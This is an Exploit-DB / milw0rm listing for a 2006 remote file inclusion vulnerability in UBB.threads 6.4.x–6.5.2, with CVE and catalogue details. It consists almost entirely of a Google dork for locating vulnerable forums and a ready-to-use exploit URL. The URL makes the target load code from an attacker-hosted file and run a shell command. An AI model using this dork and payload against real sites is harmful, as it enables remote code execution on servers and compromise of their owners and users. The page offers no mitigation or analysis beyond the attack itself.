UBB Threads 6.4.x-6.5.2 (thispath) Remote File Inclusion Vulnerability



EDB-ID: 1814 CVE: 2006-2568 OSVDB-ID: 25714
Author: V4mu Published: 2006-05-22 Verified: Verified
Exploit Code:   Download Vulnerable App:   N/A

Rating

(0.0)
 
Prev Home Next

Anomaly 1n The System presents
UBB.threads >= 6.4.x Remote File Inclusion
 
founded by V4mu in 04/20/2006

URL: http://www.ubbcentral.com
Google dork: allinurl:"/ubbthreads/"

exploit:
/addpost_newpoll.php?addpoll=preview&thispath=http://[attacker]/cmd.gif?&cmd=id
 
contact: irc.gigachat.net #A1TS

# milw0rm.com [2006-05-22]

Comments

No comments so far